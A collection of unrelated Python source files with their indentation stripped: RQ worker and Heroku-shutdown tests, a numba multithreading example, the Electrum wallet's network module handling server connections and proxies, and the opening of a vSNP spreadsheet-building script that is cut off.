self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
job.timeout = 5
w.job_monitoring_interval = 1
now = utcnow()
w.monitor_work_horse(job, queue)
fudge_factor = 1
total_time = w.job_monitoring_interval + 65 + fudge_factor
self.assertTrue((utcnow() - now).total_seconds() < total_time)
self.assertEqual(job.get_status(), JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
def schedule_access_self():
q = Queue('default', connection=get_current_connection())
q.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
def setUp(self):
super(TestWorkerSubprocess, self).setUp()
db_num = self.testconn.connection_pool.connection_kwargs['db']
self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num
def test_run_empty_queue(self):
"""Run the worker in its own process with an empty queue"""
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
def test_run_access_self(self):
"""Schedule a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
def test_run_scheduled_access_self(self):
"""Schedule a job that schedules a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(schedule_access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
def setUp(self):
super(HerokuWorkerShutdownTestCase, self).setUp()
self.sandbox = '/tmp/rq_shutdown/'
os.makedirs(self.sandbox)
def tearDown(self):
shutil.rmtree(self.sandbox, ignore_errors=True)
@slow
def test_immediate_shutdown(self):
"""Heroku work horse shutdown with immediate (0 second) kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_1_sec_shutdown(self):
"""Heroku work horse shutdown with 1 second kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
time.sleep(0.1)
self.assertEqual(p.exitcode, None)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGALRM)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_shutdown_double_sigrtmin(self):
"""Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
# we have to wait a short while otherwise the second signal wont bet processed.
time.sleep(0.1)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@mock.patch('rq.worker.logger.info')
def test_handle_shutdown_request(self, mock_logger_info):
"""Mutate HerokuWorker so _horse_pid refers to an artificial process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
path = os.path.join(self.sandbox, 'shouldnt_exist')
p = Process(target=create_file_after_timeout, args=(path, 2))
p.start()
self.assertEqual(p.exitcode, None)
w._horse_pid = p.pid
w.handle_warm_shutdown_request()
p.join(2)
# would expect p.exitcode to be -34
self.assertEqual(p.exitcode, -34)
self.assertFalse(os.path.exists(path))
mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)
def test_handle_shutdown_request_no_horse(self):
"""Mutate HerokuWorker so _horse_pid refers to non existent process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
w._horse_pid = 19999
w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
def setUp(self):
super(TestExceptionHandlerMessageEncoding, self).setUp()
self.worker = Worker("foo")
self.worker._exc_handlers = []
# Mimic how exception info is actually passed forwards
try:
raise Exception(u"💪")
except Exception:
self.exc_info = sys.exc_info()
def test_handle_exception_handles_non_ascii_in_exception_message(self):
"""worker.handle_exception doesn't crash on non-ascii in exception message."""
self.worker.handle_exception(Mock(), *self.exc_info)
|
multithread.py
|
# -*- coding: utf-8 -*-
"""
Example of multithreading by releasing the GIL through ctypes.
"""
from __future__ import print_function, division, absolute_import
from timeit import repeat
import threading
from ctypes import pythonapi, c_void_p
from math import exp
import numpy as np
from numba import jit, void, double
nthreads = 2
size = 1e6
def timefunc(correct, s, func, *args, **kwargs):
print(s.ljust(20), end=" ")
# Make sure the function is compiled before we start the benchmark
res = func(*args, **kwargs)
if correct is not None:
assert np.allclose(res, correct)
# time it
print('{:>5.0f} ms'.format(min(repeat(lambda: func(*args, **kwargs),
number=5, repeat=2)) * 1000))
return res
def make_singlethread(inner_func):
def func(*args):
length = len(args[0])
result = np.empty(length, dtype=np.float64)
inner_func(result, *args)
return result
return func
def make_multithread(inner_func, numthreads):
def func_mt(*args):
length = len(args[0])
result = np.empty(length, dtype=np.float64)
args = (result,) + args
chunklen = (length + 1) // numthreads
chunks = [[arg[i * chunklen:(i + 1) * chunklen] for arg in args]
for i in range(numthreads)]
# You should make sure inner_func is compiled at this point, because
# the compilation must happen on the main thread. This is the case
# in this example because we use jit().
threads = [threading.Thread(target=inner_func, args=chunk)
for chunk in chunks[:-1]]
for thread in threads:
thread.start()
# the main thread handles the last chunk
inner_func(*chunks[-1])
for thread in threads:
thread.join()
return result
return func_mt
savethread = pythonapi.PyEval_SaveThread
savethread.argtypes = []
savethread.restype = c_void_p
restorethread = pythonapi.PyEval_RestoreThread
restorethread.argtypes = [c_void_p]
restorethread.restype = None
def inner_func(result, a, b):
threadstate = savethread()
for i in range(len(result)):
result[i] = exp(2.1 * a[i] + 3.2 * b[i])
restorethread(threadstate)
signature = void(double[:], double[:], double[:])
inner_func_nb = jit(signature, nopython=True)(inner_func)
func_nb = make_singlethread(inner_func_nb)
func_nb_mt = make_multithread(inner_func_nb, nthreads)
def func_np(a, b):
return np.exp(2.1 * a + 3.2 * b)
a = np.random.rand(size)
b = np.random.rand(size)
c = np.random.rand(size)
correct = timefunc(None, "numpy (1 thread)", func_np, a, b)
timefunc(correct, "numba (1 thread)", func_nb, a, b)
timefunc(correct, "numba (%d threads)" % nthreads, func_nb_mt, a, b)
|
network.py
|
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import queue
import os
import random
import re
from collections import defaultdict
import threading
import socket
import json
import sys
import ipaddress
import asyncio
from typing import NamedTuple, Optional
import dns
import dns.resolver
from aiorpcx import TaskGroup
from . import util
from .util import PrintError, print_error, aiosafe, bfh
from .bitcoin import COIN
from . import constants
from . import blockchain
from .interface import Interface, serialize_server, deserialize_server
from .version import PROTOCOL_VERSION
from .simple_config import SimpleConfig
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = constants.net.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
def filter_version(servers):
def is_recent(version):
try:
return util.versiontuple(version) >= util.versiontuple(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_noonion(servers):
return {k: v for k, v in servers.items() if not k.endswith('.onion')}
def filter_protocol(hostmap, protocol='s'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = constants.net.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
NetworkParameters = NamedTuple("NetworkParameters", [("host", str),
("port", str),
("protocol", str),
("proxy", Optional[dict]),
("auto_connect", bool)])
proxy_modes = ['socks4', 'socks5']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'),
p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s: str) -> Optional[dict]:
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
# FIXME raw IPv6 address fails here
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
INSTANCE = None
class Network(PrintError):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
verbosity_filter = 'n'
def __init__(self, config=None):
global INSTANCE
INSTANCE = self
if config is None:
config = {} # Do not use mutables as default values!
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
blockchain.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", list(blockchain.blockchains.keys()))
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in blockchain.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
# locks: if you need to take multiple ones, acquire them in the order they are defined here!
self.bhi_lock = asyncio.Lock()
self.interface_lock = threading.RLock() # <- re-entrant
self.callback_lock = threading.Lock()
self.recent_servers_lock = threading.RLock() # <- re-entrant
self.server_peers = {} # returned by interface (servers that the main interface knows about)
self.recent_servers = self.read_recent_servers() # note: needs self.recent_servers_lock
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks set by the GUI
self.callbacks = defaultdict(list) # note: needs self.callback_lock
dir_path = os.path.join(self.config.path, 'certs')
util.make_dir(dir_path)
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None # note: needs self.interface_lock
self.interfaces = {} # note: needs self.interface_lock
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.server_queue = None
self.server_queue_group = None
self.asyncio_loop = asyncio.get_event_loop()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
@staticmethod
def get_instance():
return INSTANCE
def with_interface_lock(func):
def func_wrapper(self, *args, **kwargs):
with self.interface_lock:
return func(self, *args, **kwargs)
return func_wrapper
def with_recent_servers_lock(func):
def func_wrapper(self, *args, **kwargs):
with self.recent_servers_lock:
return func(self, *args, **kwargs)
return func_wrapper
def register_callback(self, callback, events):
with self.callback_lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.callback_lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.callback_lock:
callbacks = self.callbacks[event][:]
for callback in callbacks:
if asyncio.iscoroutinefunction(callback):
# FIXME: if callback throws, we will lose the traceback
asyncio.run_coroutine_threadsafe(callback(event, *args), self.asyncio_loop)
else:
callback(event, *args)
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r", encoding='utf-8') as f:
data = f.read()
return json.loads(data)
except:
return []
@with_recent_servers_lock
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w", encoding='utf-8') as f:
f.write(s)
except:
pass
@with_interface_lock
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None and self.interface.ready.done()
def is_connecting(self):
return self.connection_status == 'connecting'
async def request_server_info(self, interface):
await interface.ready
session = interface.session
async def get_banner():
self.banner = await session.send_request('server.banner')
self.notify('banner')
async def get_donation_address():
self.donation_address = await session.send_request('server.donation_address')
async def get_server_peers():
self.server_peers = parse_servers(await session.send_request('server.peers.subscribe'))
self.notify('servers')
async def get_relay_fee():
relayfee = await session.send_request('blockchain.relayfee')
if relayfee is None:
self.relay_fee = None
else:
relayfee = int(relayfee * COIN)
self.relay_fee = max(0, relayfee)
async with TaskGroup() as group:
await group.spawn(get_banner)
await group.spawn(get_donation_address)
await group.spawn(get_server_peers)
await group.spawn(get_relay_fee)
await group.spawn(self.request_fee_estimates(interface))
async def request_fee_estimates(self, interface):
session = interface.session
from .simple_config import FEE_ETA_TARGETS
self.config.requested_fee_estimates()
async with TaskGroup() as group:
histogram_task = await group.spawn(session.send_request('mempool.get_fee_histogram'))
fee_tasks = []
for i in FEE_ETA_TARGETS:
fee_tasks.append((i, await group.spawn(session.send_request('blockchain.estimatefee', [i]))))
self.config.mempool_fees = histogram = histogram_task.result()
self.print_error('fee_histogram', histogram)
self.notify('fee_histogram')
for i, task in fee_tasks:
fee = int(task.result() * COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'fee_histogram':
value = self.config.mempool_fees
elif key == 'servers':
value = self.get_servers()
else:
raise Exception('unexpected trigger key {}'.format(key))
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self) -> NetworkParameters:
host, port, protocol = deserialize_server(self.default_server)
return NetworkParameters(host, port, protocol, self.proxy, self.auto_connect)
def get_donation_address(self):
if self.is_connected():
return self.donation_address
@with_interface_lock
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
@with_recent_servers_lock
def get_servers(self):
# start with hardcoded servers
out = constants.net.DEFAULT_SERVERS
# add recent servers
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = {protocol: port}
# add servers received from main interface
if self.server_peers:
out.update(filter_version(self.server_peers.copy()))
# potentially filter out some
if self.config.get('noonion'):
out = filter_noonion(out)
return out
@with_interface_lock
def start_interface(self, server):
if server not in self.interfaces and server not in self.connecting:
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
self.server_queue.put(server)
def start_random_interface(self):
with self.interface_lock:
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
return server
def set_proxy(self, proxy: Optional[dict]):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
if sys.platform == 'win32':
# On Windows, socket.getaddrinfo takes a mutex, and might hold it for up to 10 seconds
# when dns-resolving. To speed it up drastically, we resolve dns ourselves, outside that lock.
# see #4421
socket.getaddrinfo = self._fast_getaddrinfo
else:
socket.getaddrinfo = socket._getaddrinfo
self.trigger_callback('proxy_set', self.proxy)
@staticmethod
def _fast_getaddrinfo(host, *args, **kwargs):
def needs_dns_resolving(host2):
try:
ipaddress.ip_address(host2)
return False # already valid IP
except ValueError:
pass # not an IP
if str(host) in ('localhost', 'localhost.',):
return False
return True
try:
if needs_dns_resolving(host):
answers = dns.resolver.query(host)
addr = str(answers[0])
else:
addr = host
except dns.exception.DNSException:
# dns failed for some reason, e.g. dns.resolver.NXDOMAIN
# this is normal. Simply report back failure:
raise socket.gaierror(11001, 'getaddrinfo failed')
except BaseException as e:
# Possibly internal error in dnspython :( see #4483
# Fall back to original socket.getaddrinfo to resolve dns.
print_error('dnspython failed to resolve dns with error:', e)
addr = host
return socket._getaddrinfo(addr, *args, **kwargs)
@with_interface_lock
def start_network(self, protocol: str, proxy: Optional[dict]):
assert not self.interface and not self.interfaces
assert not self.connecting and not self.server_queue
assert not self.server_queue_group
self.print_error('starting network')
self.disconnected_servers = set([]) # note: needs self.interface_lock
self.protocol = protocol
self._init_server_queue()
self.set_proxy(proxy)
self.start_interface(self.default_server)
self.trigger_callback('network_updated')
def _init_server_queue(self):
self.server_queue = queue.Queue()
self.server_queue_group = server_queue_group = TaskGroup()
async def job():
forever = asyncio.Event()
async with server_queue_group as group:
await group.spawn(forever.wait())
asyncio.run_coroutine_threadsafe(job(), self.asyncio_loop)
@with_interface_lock
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting.clear()
self._stop_server_queue()
self.trigger_callback('network_updated')
def _stop_server_queue(self):
# Get a new queue - no old pending connections thanks!
self.server_queue = None
asyncio.run_coroutine_threadsafe(self.server_queue_group.cancel_remaining(), self.asyncio_loop)
self.server_queue_group = None
def set_parameters(self, net_params: NetworkParameters):
proxy = net_params.proxy
proxy_str = serialize_proxy(proxy)
host, port, protocol = net_params.host, net_params.port, net_params.protocol
server_str = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', net_params.auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server_str, True)
# abort if changes were not allowed by config
if self.config.get('server') != server_str or self.config.get('proxy') != proxy_str:
return
self.auto_connect = net_params.auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
with self.interface_lock:
self.stop_network()
self.default_server = server_str
self.start_network(protocol, proxy)
elif self.default_server != server_str:
self.switch_to_interface(server_str)
else:
self.switch_lagging_interface()
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
@with_interface_lock
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
def filt(x):
a = x[1].tip_header
b = header
assert type(a) is type(b)
return a == b
filtered = list(map(lambda x: x[0], filter(filt, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
@with_interface_lock
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
if self.interface is not None:
# Stop any current interface in order to terminate subscriptions,
# and to cancel tasks in interface.group.
# However, for headers sub, give preference to this interface
# over unknown ones, i.e. start it again right away.
old_server = self.interface.server
self.close_interface(self.interface)
if old_server != server and len(self.interfaces) <= self.num_server:
self.start_interface(old_server)
self.interface = i
asyncio.get_event_loop().create_task(
i.group.spawn(self.request_server_info(i)))
self.trigger_callback('default_server_changed')
self.set_status('connected')
self.trigger_callback('network_updated')
@with_interface_lock
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
@with_recent_servers_lock
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
@with_interface_lock
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.trigger_callback('network_updated')
@aiosafe
async def new_interface(self, server):
interface = Interface(self, server, self.config.path, self.proxy)
timeout = 10 if not self.proxy else 20
try:
await asyncio.wait_for(interface.ready, timeout)
except BaseException as e:
#import traceback
#traceback.print_exc()
self.print_error(interface.server, "couldn't launch because", str(e), str(type(e)))
# note: connection_down will not call interface.close() as
# interface is not yet in self.interfaces. OTOH, calling
# interface.close() here will sometimes raise deep inside the
# asyncio internal select.select... instead, interface will close
# itself when it detects the cancellation of interface.ready;
# however this might take several seconds...
self.connection_down(interface.server)
return
finally:
try: self.connecting.remove(server)
except KeyError: pass
with self.interface_lock:
self.interfaces[server] = interface
if server == self.default_server:
self.switch_to_interface(server)
self.add_recent_server(server)
self.trigger_callback('network_updated')
def init_headers_file(self):
b = blockchain.blockchains[0]
filename = b.path()
length = 80 * len(constants.net.CHECKPOINTS) * 2016
if not os.path.exists(filename) or os.path.getsize(filename) < length:
with open(filename, 'wb') as f:
if length>0:
f.seek(length-1)
f.write(b'\x00')
with b.lock:
b.update_size()
async def get_merkle_for_transaction(self, tx_hash, tx_height):
return await self.interface.session.send_request('blockchain.transaction.get_merkle', [tx_hash, tx_height])
def broadcast_transaction_from_non_network_thread(self, tx, timeout=10):
# note: calling this from the network thread will deadlock it
fut = asyncio.run_coroutine_threadsafe(self.broadcast_transaction(tx, timeout=timeout), self.asyncio_loop)
return fut.result()
async def broadcast_transaction(self, tx, timeout=10):
try:
out = await self.interface.session.send_request('blockchain.transaction.broadcast', [str(tx)], timeout=timeout)
except asyncio.TimeoutError as e:
return False, "error: operation timed out"
except Exception as e:
return False, "error: " + str(e)
if out != tx.txid():
return False, "error: " + out
return True, out
async def request_chunk(self, height, tip=None, *, can_return_early=False):
return await self.interface.request_chunk(height, tip=tip, can_return_early=can_return_early)
@with_interface_lock
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.forkpoint
return blockchain.blockchains[self.blockchain_index]
@with_interface_lock
def get_blockchains(self):
out = {}
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for k, b in blockchain_items:
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
bc = blockchain.blockchains.get(index)
if bc:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
with self.interface_lock:
interfaces = list(self.interfaces.values())
for i in interfaces:
if i.blockchain == bc:
self.switch_to_interface(i.server)
break
else:
raise Exception('blockchain not found', index)
with self.interface_lock:
if self.interface:
net_params = self.get_parameters()
host, port, protocol = deserialize_server(self.interface.server)
net_params = net_params._replace(host=host, port=port, protocol=protocol)
self.set_parameters(net_params)
def get_local_height(self):
return self.blockchain().height()
def export_checkpoints(self, path):
# run manually from the console to generate checkpoints
cp = self.blockchain().get_checkpoints()
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(cp, indent=4))
def start(self, fx=None):
self.main_taskgroup = TaskGroup()
async def main():
self.init_headers_file()
async with self.main_taskgroup as group:
await group.spawn(self.maintain_sessions())
if fx: await group.spawn(fx)
self._wrapper_thread = threading.Thread(target=self.asyncio_loop.run_until_complete, args=(main(),))
self._wrapper_thread.start()
def stop(self):
asyncio.run_coroutine_threadsafe(self.main_taskgroup.cancel_remaining(), self.asyncio_loop)
def join(self):
self._wrapper_thread.join(1)
async def maintain_sessions(self):
while True:
while self.server_queue.qsize() > 0:
server = self.server_queue.get()
await self.server_queue_group.spawn(self.new_interface(server))
remove = []
for k, i in self.interfaces.items():
if i.fut.done() and not i.exception:
assert False, "interface future should not finish without exception"
if i.exception:
if not i.fut.done():
try: i.fut.cancel()
except Exception as e: self.print_error('exception while cancelling fut', e)
try:
raise i.exception
except BaseException as e:
self.print_error(i.server, "errored because:", str(e), str(type(e)))
remove.append(k)
for k in remove:
self.connection_down(k)
# nodes
now = time.time()
for i in range(self.num_server - len(self.interfaces) - len(self.connecting)):
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
else:
if self.config.is_fee_estimates_update_required():
await self.interface.group.spawn(self.request_fee_estimates(self.interface))
await asyncio.sleep(0.1)
|
vsnp_build_tables.py
|
#!/usr/bin/env python
import argparse
import multiprocessing
import os
import queue
import re
import pandas
import pandas.io.formats.excel
from Bio import SeqIO
# Maximum columns allowed in a LibreOffice
# spreadsheet is 1024. Excel allows for
# 16,384 columns, but we'll set the lower
# number as the maximum. Some browsers
# (e.g., Firefox on Linux) are configured
# to use LibreOffice for Excel spreadsheets.
MAXCOLS = 1024
OUTPUT_EXCEL_DIR = 'output_excel_dir'
INPUT_JSON_AVG_MQ_DIR = 'input_json_avg_mq_dir'
INPUT_JSON_DIR = 'input_json_dir'
INPUT_NEWICK_DIR = 'input_newick_dir'
def annotate_table(table_df, group, annotation_dict):
for gbk_chrome, pro in list(annotation_dict.items()):
ref_pos = list(table_df)
ref_series = pandas.Series(ref_pos)
ref_df = pandas.DataFrame(ref_series.str.split(':', expand=True).values, columns=['reference', 'position'])
all_ref = ref_df[ref_df['reference'] == gbk_chrome]
positions = all_ref.position.to_frame()
# Create an annotation file.
annotation_file = "%s_annotations.csv" % group
with open(annotation_file, "a") as fh:
for _, row in positions.iterrows():
pos = row.position
try:
aaa = pro.iloc[pro.index.get_loc(int(pos))][['chrom', 'locus', 'product', 'gene']]
try:
chrom, name, locus, tag = aaa.values[0]
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except ValueError:
# If only one annotation for the entire
# chromosome (e.g., flu) then having [0] fails
chrom, name, locus, tag = aaa.values
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except KeyError:
print("{}:{}\tNo annotated product".format(gbk_chrome, pos), file=fh)
# Read the annotation file into a data frame.
annotations_df = pandas.read_csv(annotation_file, sep='\t', header=None, names=['index', 'annotations'], index_col='index')
# Remove the annotation_file from disk since both
